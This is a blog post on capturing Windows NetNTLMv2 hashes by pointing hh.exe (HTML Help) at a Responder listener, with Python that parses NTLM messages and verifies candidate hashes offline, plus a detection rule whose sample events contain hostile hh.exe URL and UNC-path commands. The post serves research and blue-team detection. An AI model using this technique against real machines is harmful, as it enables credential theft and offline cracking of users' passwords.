Stealing NetNTLM Hash Using hh.exe

A few days ago, I was looking into a Python documentation shortcut on Windows that suddenly wouldn't open. It gave me an error saying it could not open the file.

Then I remembered that I had just upgraded Python from 3.9.1 to 3.9.2 via Chocolatey. Apparently, the upgrade process doesn't update the shortcut for the local documentation.

So I went to the directory the shortcut pointed to and changed python391.chm to python392.chm, which fixed the error.

After the shortcut worked and the documentation opened, I idly right-clicked on the documentation window's title bar and saw the "Jump to URL…" menu item.

The menu brought up this window.

Since I was curious, I filled the URL box with http://localhost:53, and at the same time I set up an ncat listener on port 53.

As expected, ncat captured an HTTP request.

After that, I tried it with Responder on my Kali Linux box and redid the steps above, but this time I triggered the request via the command prompt.

I checked on my Kali box, and I could see that my hash had been captured.
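What happens on the wire here is standard HTTP NTLM authentication: Responder answers the request hh.exe sends with a 401 and WWW-Authenticate: NTLM, the client replies with a Type 1 NEGOTIATE, gets a Type 2 CHALLENGE carrying an 8-byte server challenge, and finally sends a Type 3 AUTHENTICATE containing the NTLMv2 response. Responder prints that as user::domain:challenge:NTProofStr:blob (hashcat mode 5600). The following is an added example, not the author's code or Responder's: it parses a constructed Type 2/Type 3 pair, emits that line, and then performs the offline check a cracker does against a candidate NT hash. The NT hash, challenge, blob and user names are constructed values (a real NT hash is MD4 of the UTF-16LE password; MD4 is skipped here because hashlib's md4 depends on the OpenSSL legacy provider).

```python
import hashlib
import hmac
import struct

NTLMSSP_SIG = b"NTLMSSP\x00"
NTLMSSP_NEGOTIATE_UNICODE = 0x00000001


def _secbuf(msg, off):
    """Read a Len/MaxLen/Offset security-buffer descriptor at `off` and return its bytes."""
    length, _maxlen, offset = struct.unpack_from("<HHI", msg, off)
    return msg[offset:offset + length]


def parse_challenge(msg):
    """Server challenge (8 bytes at offset 24) from a CHALLENGE_MESSAGE (Type 2)."""
    if msg[:8] != NTLMSSP_SIG or struct.unpack_from("<I", msg, 8)[0] != 2:
        raise ValueError("not an NTLMSSP CHALLENGE_MESSAGE")
    return msg[24:32]


def parse_authenticate(msg):
    """Strings and responses from an AUTHENTICATE_MESSAGE (Type 3)."""
    if msg[:8] != NTLMSSP_SIG or struct.unpack_from("<I", msg, 8)[0] != 3:
        raise ValueError("not an NTLMSSP AUTHENTICATE_MESSAGE")
    flags = struct.unpack_from("<I", msg, 60)[0]  # NegotiateFlags follow the six security buffers
    enc = "utf-16-le" if flags & NTLMSSP_NEGOTIATE_UNICODE else "latin-1"
    return {
        "lm_response": _secbuf(msg, 12),
        "nt_response": _secbuf(msg, 20),
        "domain": _secbuf(msg, 28).decode(enc),
        "user": _secbuf(msg, 36).decode(enc),
        "workstation": _secbuf(msg, 44).decode(enc),
    }


def netntlmv2_line(challenge, auth):
    """Responder / hashcat -m 5600 format: user::domain:challenge:NTProofStr:blob."""
    nt = auth["nt_response"]
    if len(nt) <= 24:  # a 24-byte NT response is NTLMv1, which is formatted differently
        raise ValueError("NTLMv1 response, not NTLMv2")
    return "%s::%s:%s:%s:%s" % (
        auth["user"], auth["domain"], challenge.hex(), nt[:16].hex(), nt[16:].hex())


def ntlmv2_proof(nt_hash, user, domain, challenge, blob):
    """NTProofStr = HMAC-MD5(HMAC-MD5(NThash, upper(user)+domain), challenge+blob)."""
    v2_hash = hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()
    return hmac.new(v2_hash, challenge + blob, hashlib.md5).digest()


def check_candidate(line, nt_hash):
    """Offline check a cracker performs: does this NT hash reproduce the captured NTProofStr?"""
    user, _, domain, chal, proof, blob = line.split(":")
    calc = ntlmv2_proof(nt_hash, user, domain, bytes.fromhex(chal), bytes.fromhex(blob))
    return hmac.compare_digest(calc, bytes.fromhex(proof))


# --- constructed messages standing in for a real capture (no Windows host involved) ---

def build_challenge(challenge, flags=0x00000201):
    """Minimal Type 2: sig, type, empty TargetName, flags, challenge, reserved, empty TargetInfo."""
    return (NTLMSSP_SIG + struct.pack("<I", 2) + struct.pack("<HHI", 0, 0, 48)
            + struct.pack("<I", flags) + challenge + b"\x00" * 8 + struct.pack("<HHI", 0, 0, 48))


def build_authenticate(user, domain, workstation, nt_response, flags=0x00000201):
    """Minimal Type 3 with a 64-byte header; the six security buffers point into the payload."""
    header_len = 64
    fields, payload = b"", b""
    for data in (b"\x00" * 24, nt_response, domain.encode("utf-16-le"),
                 user.encode("utf-16-le"), workstation.encode("utf-16-le"), b""):
        fields += struct.pack("<HHI", len(data), len(data), header_len + len(payload))
        payload += data
    return NTLMSSP_SIG + struct.pack("<I", 3) + fields + struct.pack("<I", flags) + payload


SAMPLE_NT_HASH = bytes(range(16))  # constructed; a real one is MD4(UTF-16LE(password))
SAMPLE_CHALLENGE = bytes.fromhex("1122334455667788")  # constructed server challenge
# Constructed NTLMv2 blob: RespType/HiRespType 1, reserved, timestamp, client nonce,
# reserved, an AV-pair list holding only the MsvAvEOL terminator, reserved.
SAMPLE_BLOB = (b"\x01\x01" + b"\x00" * 6 + bytes.fromhex("00d0b4d8a5b3d601")
               + bytes.fromhex("aabbccddeeff0011") + b"\x00" * 4 + b"\x00" * 4 + b"\x00" * 4)


def demo():
    """Capture -> hash line -> offline verification, all against the constructed sample."""
    proof = ntlmv2_proof(SAMPLE_NT_HASH, "alice", "CORP", SAMPLE_CHALLENGE, SAMPLE_BLOB)
    type2 = build_challenge(SAMPLE_CHALLENGE)
    type3 = build_authenticate("alice", "CORP", "WS01", proof + SAMPLE_BLOB)
    line = netntlmv2_line(parse_challenge(type2), parse_authenticate(type3))
    return line, check_candidate(line, SAMPLE_NT_HASH)


if __name__ == "__main__":
    print(*demo())
```

What you get is a NetNTLMv2 challenge/response, not the NT hash itself: it cannot be passed-the-hash, only cracked offline (as check_candidate does per candidate) or relayed to a service that does not require signing.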

If the resource doesn't exist (Responder off), it pops up this window.

So I think it's a bit usable in RDP, not in DOS.

Update:

I just found out that this program is already listed on the LOLBAS project:

  • https://lolbas-project.github.io/
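Since hh.exe is a LOLBin, the obvious blue-team check is a process-creation rule: hh.exe is expected to open a local .chm, so a launch whose command line carries an http(s) URL or a UNC path is worth an alert. The following is an added example, not from the post or the LOLBAS project; the events are constructed in Sysmon Event ID 1 shape and the 192.0.2.10 address is a documentation placeholder.

```python
import re

# An http(s) URL or a UNC path (\\host\share...) on the command line makes hh.exe reach out over the network.
REMOTE_TARGET = re.compile(r"(?i)(?:https?://\S+|\\\\[^\\\s]+\\\S*)")

# Constructed process-creation events in Sysmon Event ID 1 shape (not real logs).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\hh.exe",
     "CommandLine": r'"C:\Windows\hh.exe" C:\Python39\Doc\python392.chm',
     "ParentImage": r"C:\Windows\explorer.exe"},  # benign: the Start Menu documentation shortcut
    {"Image": r"C:\Windows\hh.exe",
     "CommandLine": r"hh.exe http://192.0.2.10/",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\hh.exe",
     "CommandLine": r"hh.exe \\192.0.2.10\share\docs.chm",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c type http://192.0.2.10/",
     "ParentImage": r"C:\Windows\explorer.exe"},  # not hh.exe: out of scope for this rule
]


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def hh_remote_target(event):
    """Return the remote target if this event is hh.exe launched at a URL/UNC path, else None."""
    if _basename(event.get("Image", "")) != "hh.exe":
        return None
    m = REMOTE_TARGET.search(event.get("CommandLine", ""))
    return m.group(0) if m else None


def triage(events):
    """List (parent process, remote target) for every suspicious hh.exe launch."""
    hits = []
    for e in events:
        target = hh_remote_target(e)
        if target:
            hits.append((_basename(e.get("ParentImage", "")), target))
    return hits


if __name__ == "__main__":
    for parent, target in triage(SAMPLE_EVENTS):
        print("hh.exe launched by %s toward %s" % (parent, target))
```

This only catches the command-line path. The "Jump to URL…" route from the post navigates inside an already running hh.exe and creates no new process, so nothing shows up in process-creation telemetry; for that case you need network-side evidence (an outbound HTTP or SMB connection carrying NTLM from a workstation to a host that is not a known server).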

I posted this because I couldn’t find hh.exe on these sites:

I mostly write about CTF solutions and other IT related stuff that others might find useful | Partially moving to: https://fahmifj.github.io
